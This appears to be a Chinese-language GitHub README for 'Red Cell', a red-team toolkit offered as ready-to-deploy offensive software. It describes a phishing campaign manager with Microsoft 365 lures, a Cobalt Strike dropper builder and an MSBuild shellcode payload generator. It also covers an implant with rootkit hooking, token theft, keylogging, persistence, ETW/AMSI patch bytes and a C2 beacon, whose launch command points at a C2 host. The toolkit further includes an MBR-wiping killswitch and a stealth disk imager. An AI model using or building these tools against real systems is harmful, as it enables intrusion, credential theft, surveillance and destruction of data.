cwill-telecom/Red-Cell
GitHub: cwill-telecom/Red-Cell
RED CELL 是一套覆盖钓鱼、植入、C2、载荷生成和反取证全链路的红队对手模拟工具包。
Stars: 0 | Forks: 0
# RED CELL

对手模拟工具包。包括 Implant、payload 生成器、钓鱼基础设施、磁盘镜像工具、kill switch 以及作战框架。
## 清单
### Implant 与 Agent
| 文件 | 类型 | 用途 |
|------|------|---------|
| `redphish.py` | Python | 钓鱼活动管理器 — SMTP 轮换、打开/点击跟踪、4 个 HTML 模板、Flask 跟踪服务器、SQLite 分析 |
| | Python | |
| `wraith.zip` | 归档 | 用户态 implant — inline hooking 引擎(C++ DLL)、token 窃取、键盘记录器、持久化、C2 beacon、Flask 面板 |
| `asm_C2_experimental/` | 目录 | 汇编级 C2 实验 — 手写 shellcode 存根、自定义协议实现、syscall 级 beaconing |
### Payload 与投递
| 文件 | 类型 | 用途 |
|------|------|---------|
| `generate_msbuild_payload.py` | Python | 通过 Donut 生成 MSBuild inline-task XML 生成器 — 使用 VirtualAlloc + CreateThread 将 EXE/DLL 转换为 LOLBin payload |
| `dropper_builder.py` | Python | 用于构建 Cobalt Strike dropper 的 Tkinter GUI — 配置监听器主机/端口、打包 payload |
| `process-hollowing1.zip` | 归档 | 进程镂空实现 — 创建挂起进程、取消映射、写入 shellcode、恢复运行 |
### Kill Switch 与反取证
| 文件 | 类型 | 用途 |
|------|------|---------|
| `killswitch.zip` | 归档 | 磁盘 + 文件 kill switch — MBR/GPT 覆盖(`0xCC`)、删除时进行文件粉碎(多通道:`0xCC` → `0x00` → `0xAA` → 随机) |
| `disk_imager.zip` | 归档 | 块级磁盘镜像工具 — 原始设备读取、zlib 压缩、TCP 流式传输、隐身模式 |
### 框架与参考
| 文件 | 类型 | 用途 |
|------|------|---------|
| `RedCell/` | 目录 | Red Cell 作战框架 — TTP 矩阵、交战工作流 |
| `RedTeam-Framework.zip` | 归档 | 通用红队工具 — 侦察、横向移动、数据外发工具 |
| `apt_tradecraft_operatonal.zip` | 归档 | 集成模块化框架 — C2 服务器、payload 构建器、规避基础设施、kill chain 流水线。完整的程序,而不仅仅是参考资料。 |
| `py_to_exe.txt` | 笔记 | 将 Python 工具编译为独立 Windows 可执行文件的指南 |
## 工具详情
### `redphish.py`
专业的钓鱼活动管理器。具备多账户轮换的 SMTP 投递、打开跟踪(1×1 像素)、点击跟踪(重定向日志记录)、SQLite 活动数据库、内置 HTML 模板(Microsoft 365、Secure Update、Secure Document、Financial Review)、SPF/DKIM/DMARC DNS 检查器、CSV 导出、交互式 TUI 和无头 CLI。
```
python redphish.py # interactive menu
python redphish.py --test --target user@corp.com
python redphish.py --tracking-server --port 8080
```
### `generate_msbuild_payload.py`
通过 Donut shellcode 将 EXE 或 DLL 转换为 MSBuild inline-task XML。自动检测 PE 架构以获取正确的 `Framework64` 路径。`WaitForSingleObject` 保持 MSBuild 处于活动状态,直到 shellcode 退出。
```
python generate_msbuild_payload.py beacon.exe -o payload.xml
python generate_msbuild_payload.py beacon.dll --dll -c Run
msbuild payload.xml
```
### `dropper_builder.py`
用于将 CS beacon 打包进 dropper 的 GUI 工具。配置监听器,可选择捆绑 EXE,并生成最终的可执行文件。
```
python dropper_builder.py
```
### `wraith.zip`
具有原生 C++ hooking DLL 的全功能用户态 implant:
- **Inline hooking** — 通过 14 字节 x64 跳板(`NtQuerySystemInformation`、`NtQueryDirectoryFile`、`NtEnumerateKey`)隐藏进程/文件/注册表
- **Token 窃取** — SeDebugPrivilege → 查找 winlogon PID → DuplicateTokenEx → ImpersonateLoggedOnUser
- **键盘记录器** — 通过 ctypes 使用 `WH_KEYBOARD_LL` 进行底层捕获,并跟踪窗口标题
- **持久化** — 计划任务 + 注册表 Run + WMI 订阅
- **C2** — 带有 XOR 加密 + jitter 的 HTTPS beacon,以及具有实时 Agent 管理功能的 Flask 面板
- **ETW/AMSI 补丁** — `EtwEventWrite` → `ret`, `AmsiScanBuffer` → `xor eax, eax; ret`
```
unzip wraith.zip && cd wraith
pip install -r requirements.txt
python c2_server.py --port 8443
python wraith.py --c2 https://IP:8443
```
### `killswitch.zip`
双层破坏:
- `killswitch.cpp` — 物理磁盘擦除。使用 `0xCC` 覆盖 MBR、GPT 和所有扇区。
- `filekill.cpp` / `filekill.py` — 文件级破坏。监控目录。当文件被删除时,系统范围内所有的副本都会被多通道粉碎并删除。
### `disk_imager.zip`
### `apt_tradecraft_operatonal.zip`
集成模块化框架 — 不是参考文档,而是功能完备的程序:
- **C2 服务器** — 用于 Agent 管理的命令与控制基础设施
- **Payload 构建器** — 生成具备可配置规避功能、随时可部署的 implant
- **规避基础设施** — 反分析、沙箱检测、EDR 绕过模块
- **Kill chain 流水线** — 从初始访问到数据外发的端到端工作流
解压并查看构建器和服务器组件以获取完整接口。
### `asm_C2_experimental/`
使用汇编语言编写的底层 C2 实验:
- 手写的 shellcode 存根,用于直接进行 syscall 调用
- 自定义协议实现 — 无库依赖,占用空间小
- Syscall 级 beaconing — 通过直接调用内核绕过用户态 hooking
- 可用作构建位置无关 implant 组件的基础模块
## 通用模式
**覆盖特征:** 工具统一使用 `0xCC`(INT 3 breakpoint)作为安全覆盖字节。
**构建链:** C++ 目标编译器为 MinGW-w64 (`x86_64-w64-mingw32-g++ -O2 -s -static`)。Python 需要 3.9+ 版本及各工具特定的依赖项。
**加密:** C2 流量使用 XOR(Wraith)或 RSA+AES-GCM 混合加密(高级 RAT)。钓鱼模板通过 HTTPS 重定向进行打开/点击跟踪。
**隐身标志:** 磁盘镜像工具上的 `--stealth` 标志会降低 I/O 优先级、隐藏控制台、重命名进程并清理 shell 历史记录。
标签:C2框架, IP 地址批量处理, macOS, 反取证, 嗅探欺骗, 子域名变形, 安全学习资源, 安全工具集合, 安全评估, 对手模拟, 权限维持, 网络信息收集, 自动回退, 载荷生成, 逆向工具